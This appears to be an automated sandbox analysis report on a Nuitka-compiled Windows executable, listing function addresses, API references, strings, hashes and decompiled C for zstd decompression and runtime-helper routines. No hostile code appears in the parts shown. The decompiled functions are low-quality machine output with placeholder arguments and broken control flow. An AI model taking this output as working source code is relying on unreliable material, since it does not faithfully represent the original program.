@, xrefs: 0040A568

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: @$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
API String ID: 1222420520-4253846632
Opcode ID: 39d56ed74ea76d0f69db474449229fa27085fd191f935673ac11919e4a8f903e
Instruction ID: f0c065cc3a5bce39441e07e8ff2809526860d5fa6bbcd36b91e92bab7fc77e2d
Opcode Fuzzy Hash: 39d56ed74ea76d0f69db474449229fa27085fd191f935673ac11919e4a8f903e
Instruction Fuzzy Hash: 0EE1D6B27046D487CB24CF29E40036EBBA1F385BC4F588126EB9A97B98DB3CC555DB05

Uniqueness

Uniqueness Score: -1.00%

Function 004016D0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 004016E8
LoadLibraryA.KERNEL32 ref: 004016FD
GetProcAddress.KERNEL32 ref: 0040171B
GetProcAddress.KERNEL32 ref: 0040172A

Strings

__deregister_frame_info, xrefs: 0040171D
libgcc_s_dw2-1.dll, xrefs: 004016E1, 004016F6
__register_frame_info, xrefs: 0040170A

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: a0c44292f4beecbb601586e794bac24e9fac3c25c3d2c687564f34cade012740
Instruction ID: c1e48f54d906c92f685e670f17b047aa54a3a702cd6dd2812bd3e11e21ff2b72
Opcode Fuzzy Hash: a0c44292f4beecbb601586e794bac24e9fac3c25c3d2c687564f34cade012740
Instruction Fuzzy Hash: D001C4A0712A09D1EE25DF15FC50B9427A4BB54788F890A26EF4D13374EF3CC65AD348

Uniqueness

Uniqueness Score: -1.00%

Function 00406070 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 293COMMON

Download Yara Rule

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 0040633E, 0040637F, 004063AC, 004063E0, 00406461, 00406491
nbBits >= 1, xrefs: 00406345, 00406378, 004063B3, 004063E7, 00406470

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
API String ID: 0-1700488978
Opcode ID: b12d22be6a0486c8e286cca36a3ed30c7224da01f5fc414da9536f9f799bfcd1
Instruction ID: 274311f34bfcdc754e6c743467be3d12ba0802f2be7adcb4fed12ddfcf3b9b22
Opcode Fuzzy Hash: b12d22be6a0486c8e286cca36a3ed30c7224da01f5fc414da9536f9f799bfcd1
Instruction Fuzzy Hash: FCB1EA72309BD442C7108F1AE95075EBB62F385BD0F45822AEBAE17BD9DA7DC528C704

Uniqueness

Uniqueness Score: -1.00%

Function 004018B0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_assert.MSVCRT ref: 00401AB9
_assert.MSVCRT ref: 00401C44

Strings

op <= oend, xrefs: 00401AB2
*ip <= *op, xrefs: 00401E6D
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h, xrefs: 00401F8B, 00401FAA, 00401FC9, 00401FE8
diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN), xrefs: 00401F92, 00401FB1
*op - *ip >= 8, xrefs: 00401F3C
diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN, xrefs: 00401FD0, 00401FEF
(ovtype == ZSTD_no_overlap && (diff <= -8 || diff >= 8 || op >= oend_w)) || (ovtype == ZSTD_overlap_src_before_dst && diff >= 0), xrefs: 00401AF5, 00401C3D
op - ip >= 8, xrefs: 00401F53
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00401AAB, 00401AEE, 00401C36, 00401E66, 00401F35, 00401F4C

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: (ovtype == ZSTD_no_overlap && (diff <= -8 || diff >= 8 || op >= oend_w)) || (ovtype == ZSTD_overlap_src_before_dst && diff >= 0)$*ip <= *op$*op - *ip >= 8$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/zstd_internal.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$diff >= 8 || (ovtype == ZSTD_no_overlap && diff <= -WILDCOPY_VECLEN)$diff >= WILDCOPY_VECLEN || diff <= -WILDCOPY_VECLEN$op - ip >= 8$op <= oend
API String ID: 1222420520-2145626313
Opcode ID: a7eb3c1a949c88e6a7b41b4bbe2427496fdce6e855ba42ccb470643663ad8da6
Instruction ID: 8fa36b38b05cd7df7b9a7335e3154dac448878c4685e51b9ba02bff09dc44b8f
Opcode Fuzzy Hash: a7eb3c1a949c88e6a7b41b4bbe2427496fdce6e855ba42ccb470643663ad8da6
Instruction Fuzzy Hash: 600209A2B1A69486DF108F29D4003AD7B62E755BD4F88C233DB69177E5EB7CC649C304

Uniqueness

Uniqueness Score: -1.00%

Function 00403120 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 0040316B
memset.MSVCRT ref: 004031C8
_assert.MSVCRT ref: 0040331B

Strings

count == -1, xrefs: 00403314
threshold > 1, xrefs: 00403342
(bitCount >> 3) <= 3, xrefs: 004034CD
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/entropy_common.c, xrefs: 0040330D, 0040333B, 004034C6, 004034EB
(bitStream & 3) < 3, xrefs: 004034F2

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assertmemcpymemset
String ID: (bitCount >> 3) <= 3$(bitStream & 3) < 3$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/entropy_common.c$count == -1$threshold > 1
API String ID: 951691328-1972499916
Opcode ID: f4a3c4e0a0f8b99ce230efd95a505887ab17647a83c64ec131ec507a51b6cca2
Instruction ID: 3af6e9bf1622fd9dc55c73f1e24f50957c5d69d8b2704a892ef3e0034c8550da
Opcode Fuzzy Hash: f4a3c4e0a0f8b99ce230efd95a505887ab17647a83c64ec131ec507a51b6cca2
Instruction Fuzzy Hash: 5791467271868492DB24CF15E84035E7B25F385BA5F40832ADF6A1BBD4DB3CCA49CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00403C60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 52
synchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessId.KERNEL32 ref: 00403C73
GenerateConsoleCtrlEvent.KERNEL32 ref: 00403C7D
WaitForSingleObject.KERNEL32 ref: 00403C97
CloseHandle.KERNEL32 ref: 00403CA4
GetLastError.KERNEL32 ref: 00403D30
FormatMessageA.KERNEL32 ref: 00403D61
puts.MSVCRT ref: 00403D6E
puts.MSVCRT ref: 00403D78

Strings

Failed to send CTRL-C to child process., xrefs: 00403D67

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: puts$CloseConsoleCtrlErrorEventFormatGenerateHandleLastMessageObjectProcessSingleWait
String ID: Failed to send CTRL-C to child process.
API String ID: 3725852347-1574864964
Opcode ID: 58c5650803b227a57b093dbd143f00534e9717872a97dc5eaab3ba8b10ec1946
Instruction ID: 26a3bc8c24f7d27d5c9a78b306cf113a0ae9ba3d695160d5e98c584babd3a35e
Opcode Fuzzy Hash: 58c5650803b227a57b093dbd143f00534e9717872a97dc5eaab3ba8b10ec1946
Instruction Fuzzy Hash: 53216FB2614A4086FB10CF20F81531A77B0FB85759F905229EB8A977A4DF3DC659CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 0041DC7A
mbstowcs.MSVCRT ref: 0041DC96
_assert.MSVCRT ref: 0041DCB5

Strings

res == 1, xrefs: 0041DCAE
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\static_src/HelpersSafeStrings.c, xrefs: 0041DC34

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assertmbstowcswcslen
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\static_src/HelpersSafeStrings.c$res == 1
API String ID: 1857258003-1877585308
Opcode ID: c36487fe49334edcd11ebdd495428ea70484884b613d889f0026ffbea020cd98
Instruction ID: c408769ffee888b10102f0c260c1b348419694bba7b1d61961c5430e6ce37008
Opcode Fuzzy Hash: c36487fe49334edcd11ebdd495428ea70484884b613d889f0026ffbea020cd98
Instruction Fuzzy Hash: B62146B3B015A084DA219B26BC413BBAA60BB45B98F8C8912EF8907355E77DC5D1D348

Uniqueness

Uniqueness Score: -1.00%

Function 00402510 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00402510(signed long long __rcx, void* __rdx, signed long long __r8, signed long long __r9, intOrPtr _a40, long long* _a48, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72, intOrPtr _a80) {
				long long _v88;
				void* _t22;
				signed int _t24;
				signed long long _t44;
				void* _t47;
				signed long long _t66;
				void* _t67;
				intOrPtr _t69;
				signed long long _t78;
				void* _t79;
				signed long long _t80;
				signed long long _t82;

				_t79 = __r8 + __r9;
				_t78 = __rcx;
				_t67 = __rdx;
				_t44 = __r8;
				_t66 = __r9;
				if(_t79 > __rdx - __rcx) {
					_t79 = 0xffffffba;
				} else {
					_t69 =  *_a48;
					if(_a56 - _t69 < __r8) {
						L11:
						_t79 = 0xffffffec;
					} else {
						if(_t79 <= 0) {
							r8d = 0x30b;
							__imp___assert();
							_t80 = __rcx + __r8;
							if(_t80 < __rcx + _t79) {
								goto L4;
							} else {
								goto L10;
							}
							L16:
						} else {
							_t80 = __rcx + __r8;
							if(_t80 >= __rcx + _t79) {
								L10:
								r8d = 0x30c;
								__imp___assert();
							}
						}
						L4:
						_t68 = _t67 - 0x20;
						_v88 = 0;
						_t82 = _t80 - _a40;
						_t22 = E004018B0(_t24, _t78, _t67 - 0x20,  *_a48, _t44);
						 *_a48 = _t44 + _t69;
						if(_t80 - _a64 >= _a40) {
							L8:
							_v88 = 1;
							_t22 = E004018B0(_t24, _t80, _t68, _t82, _t66);
						} else {
							if(_t80 - _a72 < _a40) {
								goto L11;
							} else {
								_t47 = _a64 - _t82;
								if(_a80 >= _a80 - _t47 + _t66) {
									L004259A8();
								} else {
									_t80 = _t80 + _t47;
									_t66 = _t66 - _t47;
									memcpy(??, ??, ??);
									_t82 = _a64;
									goto L8;
								}
							}
						}
					}
				}
				return _t22;
				goto L16;
			}

0x00402523
0x00402527
0x0040252a
0x00402530
0x00402533
0x00402539
0x00402690
0x0040253f
0x00402547
0x00402558
0x00402680
0x00402680
0x0040255e
0x00402561
0x004026a0
0x004026b4
0x004026ba
0x004026c5
0x00000000
0x004026cb
0x00000000
0x004026cb
0x00000000
0x00402567
0x00402567
0x00402572
0x00402658
0x00402658
0x0040266c
0x0040266c
0x00402572
0x00402578
0x00402578
0x00402593
0x0040259b
0x004025a6
0x004025be
0x004025c9
0x00402625
0x00402631
0x00402639
0x004025cb
0x004025de
0x00000000
0x004025e4
0x004025f4
0x00402606
0x004026d6
0x0040260c
0x00402612
0x00402615
0x00402618
0x0040261d
0x00000000
0x0040261d
0x00402606
0x004025de
0x004025c9
0x00402558
0x00402651
0x00000000

APIs

memcpy.MSVCRT ref: 00402618
_assert.MSVCRT ref: 0040266C
_assert.MSVCRT ref: 004026B4

Strings

oLitEnd < op + sequenceLength, xrefs: 00402665
op < op + sequenceLength, xrefs: 004026AD
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 0040265E, 004026A6

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert$memcpy
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$oLitEnd < op + sequenceLength$op < op + sequenceLength
API String ID: 3718630003-1171129319
Opcode ID: a243a890a93b320ef62eb829d641569206126378104e41c77a436590a373585a
Instruction ID: ab7253468d8d43162a6f12f4ea535ebc783056ae43e23541e1e663cacb058784
Opcode Fuzzy Hash: a243a890a93b320ef62eb829d641569206126378104e41c77a436590a373585a
Instruction Fuzzy Hash: 5A31D172301A8595CE208F16E94878AA325F745BE8F8486239E5D27BE4DF7CC18AC709

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00403C2B
_assert.MSVCRT ref: 00403C4B

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00403C1D, 00403C3A
nbBits >= 1, xrefs: 00403C24, 00403C44

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
API String ID: 1222420520-1700488978
Opcode ID: 6cda7741e3223f243d8f38b496d595a1d6d695456e76b8893a1d2e24c763784c
Instruction ID: 586a5bf4666f3d3b6ee6da93f78d6d56bea81cb9c186b6504a3382d6887de9de
Opcode Fuzzy Hash: 6cda7741e3223f243d8f38b496d595a1d6d695456e76b8893a1d2e24c763784c
Instruction Fuzzy Hash: 2511A173300998A6D714DF26E840B5A7B61F344F99F49802AEF59477A4DE38C98AD344

Uniqueness

Uniqueness Score: -1.00%

Function 00403970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00403970(void* __esi, signed int __rcx, long long* __rdx, void* __rbp, void* __r11, void* __r13, void* __r14, void* __r15, char _a32, intOrPtr _a40, signed char* _a48, long long _a56, long long _a64, long long _a72, long long _a80, intOrPtr _a88, intOrPtr _a96, long long _a104, long long _a112, intOrPtr _a120) {
				char _v152;
				char _v156;
				long long _v176;
				long long _v192;
				long long _v200;
				long long _v208;
				long long _v216;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __r12;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;
				signed int _t42;
				long long _t48;
				void* _t54;
				long long* _t64;
				signed long long _t70;
				long long _t74;
				signed int _t75;
				signed long long _t79;
				void* _t81;
				long long _t82;
				long long _t83;
				long long _t89;
				signed int _t91;

				_a32 = r9d;
				_t83 = __rcx;
				_t64 = __rdx;
				if(r8d == 2) {
					_t48 = _a56;
					_t91 =  &_v152;
					_v216 = _t48;
					_t39 = E00403120(_t48, _t91,  &_a32,  &_v156, _a48);
					if(_t48 <= 0xffffff88) {
						_t74 = _v156;
						if(_a40 >= _t74) {
							_v176 = _t48;
							_v208 = _t74;
							_t75 = _t91;
							r8d = _a32;
							_v192 = 0x800;
							_v200 = _a112;
							_t51 = _a72;
							_t89 = _a64;
							_v216 = _a72;
							if(_a120 != 0) {
								_t40 = L004026E0(_t64, __rcx, _t75, _t81, __rcx, __rbp, _t91, __r13, __r14, __r15);
							} else {
								_t40 = E00402C00(_t51, __rcx, _t75,  &_v156, _t89);
							}
							 *_t64 = _t83;
							return _t40;
						}
					}
					return _t39;
				} else {
					if(r8d == 3) {
						r9d = _a88;
						_t54 = 0xffffffec;
						if(r9d == 0) {
							goto L4;
						} else {
							r8d = _a96;
							if(r8d != 0 && _a104 > 0x18) {
								_t79 = _t42 << 3;
								do {
									asm("inc ecx");
									_t54 = _t54 + 0x40;
								} while (_t79 > _t54);
							}
							return _t38;
						}
					} else {
						if(r8d != 1) {
							 *__rdx = _a80;
							return _t38;
						}
						if(_a56 == 0) {
							L4:
							return _t38;
						} else {
							_t70 =  *_a48 & 0x000000ff;
							if(_t41 > r9d) {
								goto L4;
							} else {
								r10d = 0;
								_t82 =  *((intOrPtr*)(_a64 + _t70 * 4));
								r12d =  *((intOrPtr*)(_a72 + _t70 * 4));
								 *((long long*)(__rcx)) = 0;
								 *((char*)(__rcx + 0xb)) = 0;
								 *((intOrPtr*)(__rcx + 8)) = r10w;
								if(r12d > 0xfe) {
									r8d = 0x165;
									__imp___assert();
								}
								 *((long long*)(_t83 + 0xc)) = _t82;
								 *_t64 = _t83;
								return _t38;
							}
						}
					}
				}
			}

0x0040397c
0x00403984
0x00403987
0x0040398e
0x004039c0
0x004039c8
0x004039e5
0x004039ea
0x004039f3
0x004039f9
0x00403a04
0x00403a0a
0x00403a1e
0x00403a22
0x00403a27
0x00403a32
0x00403a3b
0x00403a40
0x00403a48
0x00403a50
0x00403a55
0x00403b80
0x00403a5b
0x00403a5b
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a04
0x00403b7b
0x00403990
0x00403994
0x00403af8
0x00403b00
0x00403b0a
0x00000000
0x00403b10
0x00403b10
0x00403b1b
0x00403b41
0x00403b48
0x00403b48
0x00403b4d
0x00403b51
0x00403b48
0x00403b64
0x00403b64
0x0040399a
0x0040399e
0x004039ac
0x00000000
0x004039af
0x00403a80
0x004039bd
0x004039bd
0x00403a86
0x00403a8e
0x00403a9b
0x00000000
0x00403aa1
0x00403aa9
0x00403aac
0x00403ab7
0x00403abb
0x00403ac2
0x00403ac6
0x00403ad2
0x00403b90
0x00403ba4
0x00403ba4
0x00403ae1
0x00403ae4
0x00403af3
0x00403af3
0x00403a9b
0x00403a80
0x00403994

Strings

nbAddBits < 255, xrefs: 00403B9D
C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00403B96

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$nbAddBits < 255
API String ID: 0-3056615513
Opcode ID: f22e65523406048f1c9523df0c218a099b79b7d20c1e6802200349cd87e2cb39
Instruction ID: fa81a0e2a2bf077a5be58c560dabec3db921ecff2793570a204e0c5e67cfc55f
Opcode Fuzzy Hash: f22e65523406048f1c9523df0c218a099b79b7d20c1e6802200349cd87e2cb39
Instruction Fuzzy Hash: AA519E72218A8481DB758F19F44079ABB64F389BB5F448326DFA917BD9DB7CC184CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00403E60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00403F2C

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00403F1E
nbBits < BIT_MASK_SIZE, xrefs: 00403F25

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits < BIT_MASK_SIZE
API String ID: 1222420520-2490357055
Opcode ID: a7ba3bb28429133b96e605709d6a51d8c39e78303f0002dedfd4302f378de472
Instruction ID: 74f4c7b778ed2a250ddbf091dcec4506a164404ee4a6a8557df480005c09b7c6
Opcode Fuzzy Hash: a7ba3bb28429133b96e605709d6a51d8c39e78303f0002dedfd4302f378de472
Instruction Fuzzy Hash: 3621B6B2710A8586D708CF25E84475D77A5F308FC8F448136EF495B384DB78C994C384

Uniqueness

Uniqueness Score: -1.00%

Function 00403F60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 0040402C

Strings

C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 0040401E
nbBits < BIT_MASK_SIZE, xrefs: 00404025

Memory Dump Source

Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _assert
String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits < BIT_MASK_SIZE
API String ID: 1222420520-2490357055
Opcode ID: 7f63b024364d176c3ed7232232ee18682f87216aaf646ae975a57b668dd4caef
Instruction ID: 15df9c9b6f0689f3bc681e5c2e15e7c41bef0dd5e31cb6e2df14c3463ae756cd
Opcode Fuzzy Hash: 7f63b024364d176c3ed7232232ee18682f87216aaf646ae975a57b668dd4caef
